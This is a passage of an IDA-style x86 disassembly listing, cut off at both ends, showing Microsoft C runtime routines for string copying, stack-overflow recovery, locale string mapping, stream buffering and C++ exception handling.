mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41C07E
loc_41C061: ; CODE XREF: sub_41BFF0+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_41C0D0
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_41C061
jmp short loc_41C07E
; ---------------------------------------------------------------------------
loc_41C079: ; CODE XREF: sub_41BFF0+A6�j
; sub_41BFF0+C0�j
mov [edi], edx
add edi, 4
loc_41C07E: ; CODE XREF: sub_41BFF0+6F�j
; sub_41BFF0+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41C079
test dl, dl
jz short loc_41C0D0
test dh, dh
jz short loc_41C0C7
test edx, 0FF0000h
jz short loc_41C0BA
test edx, 0FF000000h
jz short loc_41C0B2
jmp short loc_41C079
; ---------------------------------------------------------------------------
loc_41C0B2: ; CODE XREF: sub_41BFF0+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C0BA: ; CODE XREF: sub_41BFF0+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C0C7: ; CODE XREF: sub_41BFF0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C0D0: ; CODE XREF: sub_41BFF0+78�j
; sub_41BFF0+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41BFF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0D8 proc near ; CODE XREF: sub_4174C6+A5�p
; sub_4192C5+4DC�p ...
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 4
pop eax
call sub_416B90
mov ebx, esp
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call dword_4221A0 ; VirtualQuery
test eax, eax
jz short loc_41C16D
mov edi, [ebp+var_20]
lea eax, [ebp+var_48]
push eax
call dword_422074 ; GetSystemInfo
mov eax, [ebp+var_44]
lea esi, [eax-1]
not esi
and esi, ebx
sub esi, eax
mov [ebp+var_4], eax
mov eax, dword_481184
mov ecx, eax
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 0FFFF1000h
add ecx, 11000h
add ecx, edi
cmp esi, ecx
jb short loc_41C16D
cmp eax, 1
jz short loc_41C185
mov ebx, edi
mov edi, 1000h
loc_41C142: ; CODE XREF: sub_41C0D8+81�j
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call dword_4221A0 ; VirtualQuery
test eax, eax
jz short loc_41C16D
add ebx, [ebp+var_18]
test [ebp+var_14], edi
jz short loc_41C142
test [ebp+var_F], 1
mov ebx, [ebp+var_24]
jz short loc_41C169
xor eax, eax
inc eax
jmp short loc_41C1A1
; ---------------------------------------------------------------------------
loc_41C169: ; CODE XREF: sub_41C0D8+8A�j
cmp esi, ebx
jnb short loc_41C171
loc_41C16D: ; CODE XREF: sub_41C0D8+22�j
; sub_41C0D8+5C�j ...
xor eax, eax
jmp short loc_41C1A1
; ---------------------------------------------------------------------------
loc_41C171: ; CODE XREF: sub_41C0D8+93�j
push 4
push edi
push [ebp+var_4]
push ebx
call dword_422194 ; VirtualAlloc
mov eax, dword_481184
jmp short loc_41C187
; ---------------------------------------------------------------------------
loc_41C185: ; CODE XREF: sub_41C0D8+61�j
mov ebx, esi
loc_41C187: ; CODE XREF: sub_41C0D8+AB�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_8]
push ecx
inc eax
push eax
push [ebp+var_4]
push ebx
call dword_42219C ; VirtualProtect
loc_41C1A1: ; CODE XREF: sub_41C0D8+8F�j
; sub_41C0D8+97�j
lea esp, [ebp-54h]
pop edi
pop esi
pop ebx
leave
retn
sub_41C0D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C1A9 proc near ; CODE XREF: sub_4174C6+6F�p
; sub_4174C6+E5�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_42C150
call __SEH_prolog
xor ebx, ebx
cmp dword_48133C, ebx
jnz short loc_41C1F7
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_42C148
push 100h
push ebx
call dword_4221A8 ; LCMapStringW
test eax, eax
jz short loc_41C1E2
mov dword_48133C, esi
jmp short loc_41C1F7
; ---------------------------------------------------------------------------
loc_41C1E2: ; CODE XREF: sub_41C1A9+2F�j
call dword_422008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41C1F7
mov dword_48133C, 2
loc_41C1F7: ; CODE XREF: sub_41C1A9+14�j
; sub_41C1A9+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_41C217
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_41C202: ; CODE XREF: sub_41C1A9+61�j
dec ecx
cmp [eax], bl
jz short loc_41C20F
inc eax
cmp ecx, ebx
jnz short loc_41C202
or ecx, 0FFFFFFFFh
loc_41C20F: ; CODE XREF: sub_41C1A9+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_41C217: ; CODE XREF: sub_41C1A9+51�j
mov eax, dword_48133C
cmp eax, 2
jz loc_41C401
cmp eax, ebx
jz loc_41C401
cmp eax, 1
jnz loc_41C434
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_18], ebx
jnz short loc_41C24E
mov eax, dword_4814A8
mov [ebp+arg_18], eax
loc_41C24E: ; CODE XREF: sub_41C1A9+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call dword_4220D4 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_28], esi
cmp esi, ebx
jz loc_41C434
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41C2BA
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_41C2BA: ; CODE XREF: sub_41C1A9+F4�j
cmp [ebp+var_2C], ebx
jnz short loc_41C2DB
lea eax, [esi+esi]
push eax
call sub_416E1F
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz loc_41C434
mov [ebp+var_20], 1
loc_41C2DB: ; CODE XREF: sub_41C1A9+114�j
push esi
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_4220D4 ; MultiByteToWideChar
test eax, eax
jz loc_41C3DE
push ebx
push ebx
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A8 ; LCMapStringW
mov edi, eax
mov [ebp+var_1C], edi
cmp edi, ebx
jz loc_41C3DE
test byte ptr [ebp+arg_4+1], 4
jz short loc_41C34A
cmp [ebp+arg_14], ebx
jz loc_41C3DE
cmp edi, [ebp+arg_14]
jg loc_41C3DE
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A8 ; LCMapStringW
jmp loc_41C3DE
; ---------------------------------------------------------------------------
loc_41C34A: ; CODE XREF: sub_41C1A9+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41C388
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
xor ebx, ebx
mov [ebp+var_30], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_41C388: ; CODE XREF: sub_41C1A9+1C2�j
cmp [ebp+var_30], ebx
jnz short loc_41C3A5
lea eax, [edi+edi]
push eax
call sub_416E1F
pop ecx
mov [ebp+var_30], eax
cmp eax, ebx
jz short loc_41C3DE
mov [ebp+var_24], 1
loc_41C3A5: ; CODE XREF: sub_41C1A9+1E2�j
push edi
push [ebp+var_30]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A8 ; LCMapStringW
test eax, eax
jz short loc_41C3DE
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_41C3C8
push ebx
push ebx
jmp short loc_41C3CE
; ---------------------------------------------------------------------------
loc_41C3C8: ; CODE XREF: sub_41C1A9+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41C3CE: ; CODE XREF: sub_41C1A9+21D�j
push edi
push [ebp+var_30]
push ebx
push [ebp+arg_18]
call dword_4220D8 ; WideCharToMultiByte
mov edi, eax
loc_41C3DE: ; CODE XREF: sub_41C1A9+149�j
; sub_41C1A9+168�j ...
cmp [ebp+var_24], ebx
jz short loc_41C3EC
push [ebp+var_30]
call sub_416D07
pop ecx
loc_41C3EC: ; CODE XREF: sub_41C1A9+238�j
cmp [ebp+var_20], ebx
jz short loc_41C3FA
push [ebp+var_2C]
call sub_416D07
pop ecx
loc_41C3FA: ; CODE XREF: sub_41C1A9+246�j
mov eax, edi
jmp loc_41C55C
; ---------------------------------------------------------------------------
loc_41C401: ; CODE XREF: sub_41C1A9+76�j
; sub_41C1A9+7E�j
mov [ebp+var_34], ebx
xor edi, edi
mov [ebp+var_38], ebx
cmp [ebp+arg_0], ebx
jnz short loc_41C416
mov eax, dword_481498
mov [ebp+arg_0], eax
loc_41C416: ; CODE XREF: sub_41C1A9+263�j
cmp [ebp+arg_18], ebx
jnz short loc_41C423
mov eax, dword_4814A8
mov [ebp+arg_18], eax
loc_41C423: ; CODE XREF: sub_41C1A9+270�j
push [ebp+arg_0]
call sub_4202EF
pop ecx
mov [ebp+var_3C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_41C43B
loc_41C434: ; CODE XREF: sub_41C1A9+87�j
; sub_41C1A9+CD�j ...
xor eax, eax
jmp loc_41C55C
; ---------------------------------------------------------------------------
loc_41C43B: ; CODE XREF: sub_41C1A9+289�j
cmp eax, [ebp+arg_18]
jz loc_41C532
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_420338
add esp, 18h
mov [ebp+var_34], eax
cmp eax, ebx
jz short loc_41C434
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
mov esi, eax
mov [ebp+var_40], esi
cmp esi, ebx
jz loc_41C521
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_41E8F0
add esp, 0Ch
jmp short loc_41C4B2
; ---------------------------------------------------------------------------
loc_41C4A2: ; DATA XREF: .text:stru_42C150�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41C4A6: ; DATA XREF: .text:stru_42C150�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
xor ebx, ebx
xor edi, edi
loc_41C4B2: ; CODE XREF: sub_41C1A9+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41C4DD
push [ebp+var_40]
call sub_416E1F
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_41C4FA
push [ebp+var_40]
push ebx
push edi
call sub_41E8F0
add esp, 0Ch
mov [ebp+var_38], 1
loc_41C4DD: ; CODE XREF: sub_41C1A9+30F�j
push [ebp+var_40]
push edi
push [ebp+arg_C]
push [ebp+var_34]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
mov [ebp+var_40], eax
cmp eax, ebx
jnz short loc_41C4FE
loc_41C4FA: ; CODE XREF: sub_41C1A9+31E�j
xor esi, esi
jmp short loc_41C524
; ---------------------------------------------------------------------------
loc_41C4FE: ; CODE XREF: sub_41C1A9+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_3C]
call sub_420338
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_41C524
; ---------------------------------------------------------------------------
loc_41C521: ; CODE XREF: sub_41C1A9+2D0�j
mov esi, [ebp+var_48]
loc_41C524: ; CODE XREF: sub_41C1A9+353�j
; sub_41C1A9+376�j
cmp [ebp+var_38], ebx
jz short loc_41C54C
push edi
call sub_416D07
pop ecx
jmp short loc_41C54C
; ---------------------------------------------------------------------------
loc_41C532: ; CODE XREF: sub_41C1A9+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
mov esi, eax
loc_41C54C: ; CODE XREF: sub_41C1A9+37E�j
; sub_41C1A9+387�j
cmp [ebp+var_34], ebx
jz short loc_41C55A
push [ebp+var_34]
call sub_416D07
pop ecx
loc_41C55A: ; CODE XREF: sub_41C1A9+3A6�j
mov eax, esi
loc_41C55C: ; CODE XREF: sub_41C1A9+253�j
; sub_41C1A9+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_41C1A9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C596
loc_41C565: ; CODE XREF: sub_41C596:loc_41C59F�j
push 8
push offset stru_42C588
call __SEH_prolog
and dword ptr [ebp-4], 0
push 0
push 1
call sub_42055D
pop ecx
pop ecx
jmp short loc_41C589
; END OF FUNCTION CHUNK FOR sub_41C596
; =============== S U B R O U T I N E =======================================
sub_41C582 proc near ; DATA XREF: .text:stru_42C588�o
xor eax, eax
inc eax
retn
sub_41C582 endp
; ---------------------------------------------------------------------------
loc_41C586: ; DATA XREF: .text:stru_42C588�o
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_41C596
loc_41C589: ; CODE XREF: sub_41C596-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call dword_422040 ; ExitProcess
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41C596
; =============== S U B R O U T I N E =======================================
sub_41C596 proc near ; CODE XREF: sub_4177E9+B4�p
; sub_418A1C+76E�p ...
; FUNCTION CHUNK AT 0041C565 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0041C589 SIZE 0000000D BYTES
cmp ecx, dword_432A68
jnz short loc_41C59F
retn
; ---------------------------------------------------------------------------
loc_41C59F: ; CODE XREF: sub_41C596+6�j
jmp loc_41C565
sub_41C596 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C5A4 proc near ; CODE XREF: sub_4178A4+1E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_41E56D
test eax, eax
pop ecx
jz short loc_41C628
cmp esi, offset dword_432678
jnz short loc_41C5C2
xor eax, eax
jmp short loc_41C5CD
; ---------------------------------------------------------------------------
loc_41C5C2: ; CODE XREF: sub_41C5A4+18�j
cmp esi, offset dword_432698
jnz short loc_41C628
xor eax, eax
inc eax
loc_41C5CD: ; CODE XREF: sub_41C5A4+1C�j
inc dword_481338
test word ptr [esi+0Ch], 10Ch
jnz short loc_41C628
push ebx
push edi
lea edi, ds:481340h[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_41C60E
push ebx
call sub_416E1F
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_41C60E
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_41C61B
; ---------------------------------------------------------------------------
loc_41C60E: ; CODE XREF: sub_41C5A4+48�j
; sub_41C5A4+55�j
mov edi, [edi]
mov [esi+8], edi
mov [esi], edi
mov [esi+18h], ebx
mov [esi+4], ebx
loc_41C61B: ; CODE XREF: sub_41C5A4+68�j
or word ptr [esi+0Ch], 1102h
pop edi
xor eax, eax
pop ebx
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C628: ; CODE XREF: sub_41C5A4+10�j
; sub_41C5A4+24�j ...
xor eax, eax
pop esi
retn
sub_41C5A4 endp
; =============== S U B R O U T I N E =======================================
sub_41C62C proc near ; CODE XREF: sub_4178A4+3A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short locret_41C655
push esi
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_41C654
push esi
call sub_41AEDC
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_41C654: ; CODE XREF: sub_41C62C+10�j
pop esi
locret_41C655: ; CODE XREF: sub_41C62C+5�j
retn
sub_41C62C endp
; =============== S U B R O U T I N E =======================================
sub_41C656 proc near ; CODE XREF: sub_41CC3D+138�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_41C6A1
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_41C6A1
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_41C67C
add ecx, 8
push ecx
push edx
call sub_41EE30
test eax, eax
pop ecx
pop ecx
jnz short loc_41C69E
loc_41C67C: ; CODE XREF: sub_41C656+14�j
test byte ptr [edi], 2
jz short loc_41C686
test byte ptr [esi], 8
jz short loc_41C69E
loc_41C686: ; CODE XREF: sub_41C656+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_41C695
test byte ptr [esi], 1
jz short loc_41C69E
loc_41C695: ; CODE XREF: sub_41C656+38�j
test al, 2
jz short loc_41C6A1
test byte ptr [esi], 2
jnz short loc_41C6A1
loc_41C69E: ; CODE XREF: sub_41C656+24�j
; sub_41C656+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C6A1: ; CODE XREF: sub_41C656+5�j
; sub_41C656+D�j ...
xor eax, eax
inc eax
retn
sub_41C656 endp
; =============== S U B R O U T I N E =======================================
sub_41C6A5 proc near ; CODE XREF: sub_41C6C3+76�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41C6B2
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C6B2: ; CODE XREF: sub_41C6A5+8�j
call sub_4191CF
and dword ptr [eax+80h], 0
jmp sub_41CEC1
sub_41C6A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C6C3 proc near ; CODE XREF: sub_41C7F3+117�p
; sub_41CB16+31�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset stru_42C598
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
call sub_4191CF
add eax, 80h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
loc_41C6EB: ; CODE XREF: sub_41C6C3+8F�j
cmp esi, [ebp+arg_C]
jz short loc_41C754
cmp esi, 0FFFFFFFFh
jle short loc_41C6FA
cmp esi, [edi+4]
jl short loc_41C6FF
loc_41C6FA: ; CODE XREF: sub_41C6C3+30�j
call sub_41CEF6
loc_41C6FF: ; CODE XREF: sub_41C6C3+35�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_41C730
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_41CF30
loc_41C730: ; CODE XREF: sub_41C6C3+56�j
and [ebp+ms_exc.disabled], 0
jmp short loc_41C74F
; ---------------------------------------------------------------------------
loc_41C736: ; DATA XREF: .text:0042C5A8�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_41C6A5
retn
; ---------------------------------------------------------------------------
loc_41C73F: ; DATA XREF: .text:0042C5AC�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_41C74F: ; CODE XREF: sub_41C6C3+71�j
mov [ebp+var_1C], esi
jmp short loc_41C6EB
; ---------------------------------------------------------------------------
loc_41C754: ; CODE XREF: sub_41C6C3+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41C776
cmp esi, [ebp+arg_C]
jz short loc_41C767
call sub_41CEF6
loc_41C767: ; CODE XREF: sub_41C6C3+9D�j
mov [ebx+8], esi
call __SEH_epilog
retn
sub_41C6C3 endp
; =============== S U B R O U T I N E =======================================
sub_41C770 proc near ; DATA XREF: .text:stru_42C598�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_41C770 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C776 proc near ; CODE XREF: sub_41C6C3+95�p
call sub_4191CF
cmp dword ptr [eax+80h], 0
jle short locret_41C790
call sub_4191CF
add eax, 80h
dec dword ptr [eax]
locret_41C790: ; CODE XREF: sub_41C776+C�j
retn
sub_41C776 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C791 proc near ; CODE XREF: sub_41C936+5C�p
; sub_41CC3D+1A8�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_42C5B0
call __SEH_prolog
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41C7BF
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41C7BF
and [ebp+ms_exc.disabled], 0
push ecx
push dword ptr [eax+18h]
call sub_417A2A
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41C7BF: ; CODE XREF: sub_41C791+11�j
; sub_41C791+1B�j
call __SEH_epilog
retn
sub_41C791 endp
; =============== S U B R O U T I N E =======================================
sub_41C7C5 proc near ; DATA XREF: .text:stru_42C5B0�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_41C7C5 endp
; ---------------------------------------------------------------------------
loc_41C7CE: ; DATA XREF: .text:stru_42C5B0�o
mov esp, [ebp-18h]
jmp sub_41CEC1
; =============== S U B R O U T I N E =======================================
sub_41C7D6 proc near ; CODE XREF: sub_41C99A+7C�p
; sub_41C99A+FB�p ...
mov edx, [ecx+4]
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
test edx, edx
jl short loc_41C7F1
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_41C7F1: ; CODE XREF: sub_41C7D6+C�j
pop esi
retn
sub_41C7D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7F3 proc near ; CODE XREF: sub_41CB16+52�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0041C92D SIZE 00000003 BYTES
push 40h
push offset stru_42C5C0
call __SEH_prolog
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_20], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_2C]
push eax
call sub_417BC8
pop ecx
pop ecx
mov [ebp+var_30], eax
call sub_4191CF
mov eax, [eax+78h]
mov [ebp+var_34], eax
call sub_4191CF
mov eax, [eax+7Ch]
mov [ebp+var_38], eax
call sub_4191CF
mov [eax+78h], esi
call sub_4191CF
mov ecx, [ebp+arg_8]
mov [eax+7Ch], ecx
and [ebp+ms_exc.disabled], 0
mov [ebp+ms_exc.disabled], 1
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_417C5D
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp loc_41C91B
; ---------------------------------------------------------------------------
loc_41C878: ; DATA XREF: .text:0042C5D0�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41C8B0
mov eax, [ebp+var_3C]
cmp dword ptr [eax+10h], 3
jnz short loc_41C8B0
mov eax, [ebp+var_3C]
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41C8B0
mov eax, [ebp+var_3C]
cmp dword ptr [eax+1Ch], 0
mov [ebp+var_40], 1
jz short loc_41C8B7
loc_41C8B0: ; CODE XREF: sub_41C7F3+96�j
; sub_41C7F3+9F�j ...
mov [ebp+var_40], 0
loc_41C8B7: ; CODE XREF: sub_41C7F3+BB�j
mov eax, [ebp+var_40]
retn
; ---------------------------------------------------------------------------
loc_41C8BB: ; DATA XREF: .text:0042C5D4�o
mov esp, [ebp+ms_exc.old_esp]
mov ecx, [ebp+arg_C]
mov eax, [ecx+8]
mov [ebp+var_44], eax
mov edi, [ebp+arg_4]
mov eax, [edi+8]
mov [ebp+var_48], eax
mov edx, [ecx+10h]
mov [ebp+var_4C], edx
xor edx, edx
loc_41C8D8: ; CODE XREF: sub_41C7F3+13B�j
mov [ebp+var_50], edx
cmp edx, [ecx+0Ch]
jnb short loc_41C904
lea esi, [edx+edx*4]
mov ebx, [ebp+var_4C]
lea esi, [ebx+esi*4]
mov ebx, [esi+4]
cmp eax, ebx
jle short loc_41C92D
cmp eax, [esi+8]
jg short loc_41C92D
lea eax, [ebx+1]
mov [ebp+var_48], eax
mov edx, [ebp+var_44]
mov eax, [edx+eax*8]
mov [ebp+var_48], eax
loc_41C904: ; CODE XREF: sub_41C7F3+EB�j
push eax
push ecx
xor esi, esi
push esi
push edi
call sub_41C6C3
add esp, 10h
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov esi, [ebp+arg_0]
loc_41C91B: ; CODE XREF: sub_41C7F3+80�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41C936
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41C7F3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C7F3
loc_41C92D: ; CODE XREF: sub_41C7F3+FB�j
; sub_41C7F3+100�j
inc edx
jmp short loc_41C8D8
; END OF FUNCTION CHUNK FOR sub_41C7F3
; =============== S U B R O U T I N E =======================================
sub_41C930 proc near ; DATA XREF: .text:stru_42C5C0�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_41C930 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C936 proc near ; CODE XREF: sub_41C7F3+12C�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-30h]
call sub_417C11
pop ecx
call sub_4191CF
mov ecx, [ebp-34h]
mov [eax+78h], ecx
call sub_4191CF
mov ecx, [ebp-38h]
mov [eax+7Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_41C999
cmp dword ptr [esi+10h], 3
jnz short locret_41C999
cmp dword ptr [esi+14h], 19930520h
jnz short locret_41C999
cmp dword ptr [ebp-20h], 0
jnz short locret_41C999
cmp dword ptr [ebp-1Ch], 0
jz short locret_41C999
push dword ptr [esi+18h]
call sub_417BF0
pop ecx
test eax, eax
jz short locret_41C999
call sub_417E0A
push eax
push esi
